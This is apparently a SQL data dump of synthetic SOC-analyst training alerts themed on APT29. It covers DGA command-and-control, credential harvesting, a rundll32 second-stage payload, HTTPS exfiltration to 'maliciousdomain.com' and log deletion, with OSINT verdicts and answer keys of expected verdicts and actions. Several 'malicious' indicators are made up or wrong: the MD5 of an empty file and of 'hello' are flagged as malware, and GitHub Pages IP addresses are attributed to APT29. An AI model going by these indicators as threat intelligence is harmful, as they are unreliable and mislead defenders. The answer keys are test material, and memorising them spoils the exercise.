4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"192.168.1.101\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"admin_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"SunburstPersistence\\\",\\\"registry_value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k netsvcs\\\",\\\"hash\\\":\\\"fd6f9e4e9d53ea8d2a5a3e4a1f92c8a5\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\SolarWinds\\\\\\\\Orion\\\\\\\\Sunburst.dll\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(559, 'C2 Communication via Domain Generation Algorithm', 'high', 'DNS Traffic Analysis', 'The DNS logs indicate that a compromised host is communicating with multiple dynamically generated domains. This activity is indicative of command and control operations using a domain generation algorithm (DGA) typically employed by advanced persistent threats such as APT29.', 'Command and Control', 'T1568.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-06T14:23:45Z\",\"source_ip\":\"10.0.1.15\",\"destination_domain\":\"hgytqwoein.com\",\"queried_domains\":[\"hgytqwoein.com\",\"sjdhgqjwev.com\",\"aslkdjqwope.com\"],\"resolver_ip\":\"8.8.8.8\",\"detected_algorithm\":\"DGA\",\"associated_hash\":\"3f4d2e1a7c8bdcc9efefdc1b5ab2d3f7\",\"user\":\"jsmith\",\"process\":\"dns.exe\",\"internal_ip\":\"10.0.1.15\",\"external_ip\":\"198.51.100.14\",\"threat_actor\":\"APT29\",\"malware\":\"CustomDGA\"}', '2026-01-07 22:39:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host involved in suspicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"hgytqwoein.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Domain generated by a known DGA pattern used by APT29.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f4d2e1a7c8bdcc9efefdc1b5ab2d3f7\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT29\'s DGA malware.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"198.51.100.14\",\"is_critical\":false,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"suspicious\",\"details\":\"External IP associated with suspected command and control server.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.186Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-06T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_domain\\\":\\\"hgytqwoein.com\\\",\\\"queried_domains\\\":[\\\"hgytqwoein.com\\\",\\\"sjdhgqjwev.com\\\",\\\"aslkdjqwope.com\\\"],\\\"resolver_ip\\\":\\\"8.8.8.8\\\",\\\"detected_algorithm\\\":\\\"DGA\\\",\\\"associated_hash\\\":\\\"3f4d2e1a7c8bdcc9efefdc1b5ab2d3f7\\\",\\\"user\\\":\\\"jsmith\\\",\\\"process\\\":\\\"dns.exe\\\",\\\"internal_ip\\\":\\\"10.0.1.15\\\",\\\"external_ip\\\":\\\"198.51.100.14\\\",\\\"threat_actor\\\":\\\"APT29\\\",\\\"malware\\\":\\\"CustomDGA\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.186Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-06T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_domain\\\":\\\"hgytqwoein.com\\\",\\\"queried_domains\\\":[\\\"hgytqwoein.com\\\",\\\"sjdhgqjwev.com\\\",\\\"aslkdjqwope.com\\\"],\\\"resolver_ip\\\":\\\"8.8.8.8\\\",\\\"detected_algorithm\\\":\\\"DGA\\\",\\\"associated_hash\\\":\\\"3f4d2e1a7c8bdcc9efefdc1b5ab2d3f7\\\",\\\"user\\\":\\\"jsmith\\\",\\\"process\\\":\\\"dns.exe\\\",\\\"internal_ip\\\":\\\"10.0.1.15\\\",\\\"external_ip\\\":\\\"198.51.100.14\\\",\\\"threat_actor\\\":\\\"APT29\\\",\\\"malware\\\":\\\"CustomDGA\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.186Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-06T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_domain\\\":\\\"hgytqwoein.com\\\",\\\"queried_domains\\\":[\\\"hgytqwoein.com\\\",\\\"sjdhgqjwev.com\\\",\\\"aslkdjqwope.com\\\"],\\\"resolver_ip\\\":\\\"8.8.8.8\\\",\\\"detected_algorithm\\\":\\\"DGA\\\",\\\"associated_hash\\\":\\\"3f4d2e1a7c8bdcc9efefdc1b5ab2d3f7\\\",\\\"user\\\":\\\"jsmith\\\",\\\"process\\\":\\\"dns.exe\\\",\\\"internal_ip\\\":\\\"10.0.1.15\\\",\\\"external_ip\\\":\\\"198.51.100.14\\\",\\\"threat_actor\\\":\\\"APT29\\\",\\\"malware\\\":\\\"CustomDGA\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.186Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-06T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_domain\\\":\\\"hgytqwoein.com\\\",\\\"queried_domains\\\":[\\\"hgytqwoein.com\\\",\\\"sjdhgqjwev.com\\\",\\\"aslkdjqwope.com\\\"],\\\"resolver_ip\\\":\\\"8.8.8.8\\\",\\\"detected_algorithm\\\":\\\"DGA\\\",\\\"associated_hash\\\":\\\"3f4d2e1a7c8bdcc9efefdc1b5ab2d3f7\\\",\\\"user\\\":\\\"jsmith\\\",\\\"process\\\":\\\"dns.exe\\\",\\\"internal_ip\\\":\\\"10.0.1.15\\\",\\\"external_ip\\\":\\\"198.51.100.14\\\",\\\"threat_actor\\\":\\\"APT29\\\",\\\"malware\\\":\\\"CustomDGA\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.186Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-06T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_domain\\\":\\\"hgytqwoein.com\\\",\\\"queried_domains\\\":[\\\"hgytqwoein.com\\\",\\\"sjdhgqjwev.com\\\",\\\"aslkdjqwope.com\\\"],\\\"resolver_ip\\\":\\\"8.8.8.8\\\",\\\"detected_algorithm\\\":\\\"DGA\\\",\\\"associated_hash\\\":\\\"3f4d2e1a7c8bdcc9efefdc1b5ab2d3f7\\\",\\\"user\\\":\\\"jsmith\\\",\\\"process\\\":\\\"dns.exe\\\",\\\"internal_ip\\\":\\\"10.0.1.15\\\",\\\"external_ip\\\":\\\"198.51.100.14\\\",\\\"threat_actor\\\":\\\"APT29\\\",\\\"malware\\\":\\\"CustomDGA\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(560, 'Credential Harvesting for Lateral Movement', 'high', 'Authentication Logs', 'APT29 utilizes harvested credentials to move laterally within the network, accessing sensitive systems and data.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T12:45:32Z\",\"event_id\":\"4624\",\"computer_name\":\"server-01.internal.local\",\"logon_type\":\"3\",\"subject\":{\"user_id\":\"S-1-5-21-3623811015-3361044348-30300820-1013\",\"account_name\":\"admin_user\",\"account_domain\":\"INTERNAL\"},\"network_information\":{\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"10.0.0.15\"},\"additional_information\":{\"logon_process\":\"NtLmSsp\",\"authentication_package\":\"NTLM\",\"transmitted_services\":\"-\",\"lm_package_name\":\"-\"},\"threat_actor_ip\":\"185.199.108.153\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"APT29_tool.exe\"}', '2026-01-07 22:39:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT29.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with APT29 credential harvesting tool.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"APT29_tool.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Threat Database\",\"verdict\":\"suspicious\",\"details\":\"Executable detected during lateral movement activities.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Internal admin account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(561, 'Deployment of Second-Stage Payloads', 'high', 'Malware Analysis Reports', 'The attackers deployed second-stage payloads to enhance their intelligence-gathering capabilities and maintain control over compromised systems. This activity is associated with APT29, known for sophisticated supply chain attacks and spearphishing campaigns.', 'Execution', 'T1059', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"malware_hash\":\"f2b5b9d4e5c7a8b9d5f6a7c8e9b2f3d4\",\"username\":\"j.doe\",\"filename\":\"payload_stage2.dll\",\"process_name\":\"svchost.exe\",\"command_line\":\"rundll32.exe payload_stage2.dll,EntryPoint\",\"event_description\":\"Second-stage payload executed on the host, enhancing attacker capabilities.\"}', '2026-01-07 22:39:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT29 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host targeted by second-stage payload.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f2b5b9d4e5c7a8b9d5f6a7c8e9b2f3d4\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash identified as part of APT29 second-stage payloads.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"payload_stage2.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"File used in second-stage malware deployment.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.188Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"malware_hash\\\":\\\"f2b5b9d4e5c7a8b9d5f6a7c8e9b2f3d4\\\",\\\"username\\\":\\\"j.doe\\\",\\\"filename\\\":\\\"payload_stage2.dll\\\",\\\"process_name\\\":\\\"svchost.exe\\\",\\\"command_line\\\":\\\"rundll32.exe payload_stage2.dll,EntryPoint\\\",\\\"event_description\\\":\\\"Second-stage payload executed on the host, enhancing attacker capabilities.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.188Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"malware_hash\\\":\\\"f2b5b9d4e5c7a8b9d5f6a7c8e9b2f3d4\\\",\\\"username\\\":\\\"j.doe\\\",\\\"filename\\\":\\\"payload_stage2.dll\\\",\\\"process_name\\\":\\\"svchost.exe\\\",\\\"command_line\\\":\\\"rundll32.exe payload_stage2.dll,EntryPoint\\\",\\\"event_description\\\":\\\"Second-stage payload executed on the host, enhancing attacker capabilities.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.188Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"malware_hash\\\":\\\"f2b5b9d4e5c7a8b9d5f6a7c8e9b2f3d4\\\",\\\"username\\\":\\\"j.doe\\\",\\\"filename\\\":\\\"payload_stage2.dll\\\",\\\"process_name\\\":\\\"svchost.exe\\\",\\\"command_line\\\":\\\"rundll32.exe payload_stage2.dll,EntryPoint\\\",\\\"event_description\\\":\\\"Second-stage payload executed on the host, enhancing attacker capabilities.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.188Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"malware_hash\\\":\\\"f2b5b9d4e5c7a8b9d5f6a7c8e9b2f3d4\\\",\\\"username\\\":\\\"j.doe\\\",\\\"filename\\\":\\\"payload_stage2.dll\\\",\\\"process_name\\\":\\\"svchost.exe\\\",\\\"command_line\\\":\\\"rundll32.exe payload_stage2.dll,EntryPoint\\\",\\\"event_description\\\":\\\"Second-stage payload executed on the host, enhancing attacker capabilities.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.188Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"malware_hash\\\":\\\"f2b5b9d4e5c7a8b9d5f6a7c8e9b2f3d4\\\",\\\"username\\\":\\\"j.doe\\\",\\\"filename\\\":\\\"payload_stage2.dll\\\",\\\"process_name\\\":\\\"svchost.exe\\\",\\\"command_line\\\":\\\"rundll32.exe payload_stage2.dll,EntryPoint\\\",\\\"event_description\\\":\\\"Second-stage payload executed on the host, enhancing attacker capabilities.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(562, 'Data Exfiltration via Stealth Channels', 'high', 'Outbound Traffic Monitoring', 'Detected data exfiltration attempt by APT29 using stealthy communication channels to transmit sensitive information from the internal network to an external server.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:25:43Z\",\"source_ip\":\"10.0.5.23\",\"destination_ip\":\"185.199.110.153\",\"protocol\":\"HTTPS\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\",\"file_name\":\"confidential_report_2023.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user_id\":\"jdoe\",\"action\":\"File Upload\",\"url\":\"https://maliciousdomain.com/upload\",\"description\":\"Large data transfer detected from internal IP 10.0.5.23 to external IP 185.199.110.153 over HTTPS. File hash and size match known signatures for exfiltrated data.\"}', '2026-01-07 22:39:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.199.110.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known to be associated with APT29 operations\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with exfiltrated data by APT29\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"https://maliciousdomain.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"URL associated with data exfiltration activities\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"confidential_report_2023.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename suggests sensitive data\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.189Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:25:43Z\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"185.199.110.153\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\\\",\\\"file_name\\\":\\\"confidential_report_2023.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user_id\\\":\\\"jdoe\\\",\\\"action\\\":\\\"File Upload\\\",\\\"url\\\":\\\"https://maliciousdomain.com/upload\\\",\\\"description\\\":\\\"Large data transfer detected from internal IP 10.0.5.23 to external IP 185.199.110.153 over HTTPS. File hash and size match known signatures for exfiltrated data.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.189Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:25:43Z\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"185.199.110.153\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\\\",\\\"file_name\\\":\\\"confidential_report_2023.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user_id\\\":\\\"jdoe\\\",\\\"action\\\":\\\"File Upload\\\",\\\"url\\\":\\\"https://maliciousdomain.com/upload\\\",\\\"description\\\":\\\"Large data transfer detected from internal IP 10.0.5.23 to external IP 185.199.110.153 over HTTPS. File hash and size match known signatures for exfiltrated data.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.189Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:25:43Z\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"185.199.110.153\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\\\",\\\"file_name\\\":\\\"confidential_report_2023.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user_id\\\":\\\"jdoe\\\",\\\"action\\\":\\\"File Upload\\\",\\\"url\\\":\\\"https://maliciousdomain.com/upload\\\",\\\"description\\\":\\\"Large data transfer detected from internal IP 10.0.5.23 to external IP 185.199.110.153 over HTTPS. File hash and size match known signatures for exfiltrated data.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.189Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:25:43Z\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"185.199.110.153\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\\\",\\\"file_name\\\":\\\"confidential_report_2023.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user_id\\\":\\\"jdoe\\\",\\\"action\\\":\\\"File Upload\\\",\\\"url\\\":\\\"https://maliciousdomain.com/upload\\\",\\\"description\\\":\\\"Large data transfer detected from internal IP 10.0.5.23 to external IP 185.199.110.153 over HTTPS. File hash and size match known signatures for exfiltrated data.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.189Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:25:43Z\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"185.199.110.153\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\\\",\\\"file_name\\\":\\\"confidential_report_2023.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user_id\\\":\\\"jdoe\\\",\\\"action\\\":\\\"File Upload\\\",\\\"url\\\":\\\"https://maliciousdomain.com/upload\\\",\\\"description\\\":\\\"Large data transfer detected from internal IP 10.0.5.23 to external IP 185.199.110.153 over HTTPS. File hash and size match known signatures for exfiltrated data.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(563, 'Covering Tracks and Cleanup', 'high', 'System Logs', 'APT29 engaged in advanced defense evasion techniques by cleaning up system logs, removing files, and altering timestamps to eradicate evidence of their intrusion. The activity was detected following unusual log deletions and file manipulations on the compromised host.', 'Defense Evasion', 'T1070.004 - File Deletion', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:22:05Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.100\",\"username\":\"j.doe\",\"deleted_files\":[\"C:\\\\Windows\\\\Temp\\\\malicious_log.bak\",\"C:\\\\Users\\\\j.doe\\\\AppData\\\\Local\\\\Temp\\\\APT29_trace.txt\"],\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"action\":\"File Deletion\",\"log_source\":\"Windows Security\",\"message\":\"User j.doe executed file deletion commands to remove traces of unauthorized access.\"}', '2026-01-07 22:39:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT29 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious file used by APT29.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.190Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:22:05Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"j.doe\\\",\\\"deleted_files\\\":[\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\malicious_log.bak\\\",\\\"C:\\\\\\\\Users\\\\\\\\j.doe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\APT29_trace.txt\\\"],\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"File Deletion\\\",\\\"log_source\\\":\\\"Windows Security\\\",\\\"message\\\":\\\"User j.doe executed file deletion commands to remove traces of unauthorized 